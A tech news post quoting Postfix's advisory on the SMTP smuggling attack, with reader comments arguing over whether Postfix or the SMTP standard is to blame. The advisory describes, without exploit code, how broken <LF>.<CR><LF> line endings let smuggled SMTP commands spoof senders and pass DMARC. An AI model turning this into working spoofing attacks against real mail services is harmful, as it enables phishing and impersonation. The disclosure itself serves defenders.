from the start-off-the-New-Year-with-a-postfix-patch-Tuesday dept.
From https://www.postfix.org/smtp-smuggling.html :
Days before a 10+ day holiday break and associated production change freeze, SEC Consult has published an email spoofing attack that involves a composition of email services with specific differences in the way they handle line endings other than <CR><LF>.
Unfortunately, criticial information provided by the researcher was not passed on to Postfix maintainers before publication of the attack, otherwise we would certainly have convinced SEC Consult to change their time schedule until after people had a chance to update their Postfix systems.
The attack involves a COMPOSITION of two email services with specific differences in the way they handle line endings other than <CR><LF>:
- One email service A that does not recognize broken line endings in SMTP such as in <LF>.<CR><LF> in an email message from an authenticated attacker to a recipient at email service B, and that propagates those broken line endings verbatim when it forwards that message to:
- One different email service B that does support broken line endings in SMTP such as in <LF>.<CR><LF>. When this is followed by "smuggled" SMTP MAIL/RCPT/DATA commands and message header plus body text, email service B is tricked into receiving two email messages: one message with the content before the <LF>.<CR><LF>, and one message with the "smuggled" header plus body text after the "smuggled" SMTP commands. All this when email service A sends only one message.
Postfix is an example of email service B. Microsoft's outlook.com was an example of email service A.
The "smuggled" SMTP MAIL/RCPT/DATA commands and header plus body text can be used to spoof email from any sender whose domain is hosted at email service A, to any recipient whose domain is hosted at email service B. Such email will pass SPF-based DMARC checks at email service B, because the smuggled message has a sender address that is hosted at email service A, and because the message was received from email service A.
(Score: 3, Touché) by Mojibake Tengu on Tuesday December 26, @03:20AM (3 children)
Two fools misunderstood each other. Which one is to blame?
SMTP protocol is badly underdefined for ages... and that's fine. It is, since the very beginning, Simple Mail Transfer Protocol. Simple, you see?
You guys had 40+ years for designing some not-so-simple, a real one mail transfer protocol to agree upon, but even with all those past damages piled, you completely wasted that time, for nothing.
Even FidoNet mail tossers went to Abyss. All you can do now is... webmail. Disgusting.
Respect Authorities. Know your social status. Woke responsibly.
(Score: 1) by Splodgy Emoji on Tuesday December 26, @10:53AM (2 children)
Most communications protocols are underdefined in certain ways. SMTP is not unique in that respect; see the history of ssh, etc.
In this case, it appears that only Postfix has a vulnerability. Other open-source servers such as Exim and Sendmail do not have this vulnerability.
(Score: 3, Informative) by Anonymous Coward on Tuesday December 26, @02:23PM (1 child)
That's because Postfix is not following the standard.
https://datatracker.ietf.org/doc/html/rfc772 [ietf.org]
So Tengu is trolling as usual, even the original RFC was not badly underdefined for this case.
Now the message text is furnished, by giving a
MAIL command with no "TO" argument.
S: MAIL FROM:<waldo@A><CRLF>
R: 354 Type mail, ended by <CRLF>.<CRLF>
S: Blah blah blah blah....etc. etc. etc.
S: <CRLF>.<CRLF>
R: 250 Mail sent
(Score: 1, Informative) by Anonymous Coward on Tuesday December 26, @02:25PM
the <CRLF> sequence should be used to denote the end of a line of text.
(Score: 2) by driverless on Tuesday December 26, @09:40AM
I feel I was I feel I was denied... critical.... NEED TO KNOW.... INFORMATION [youtube.com].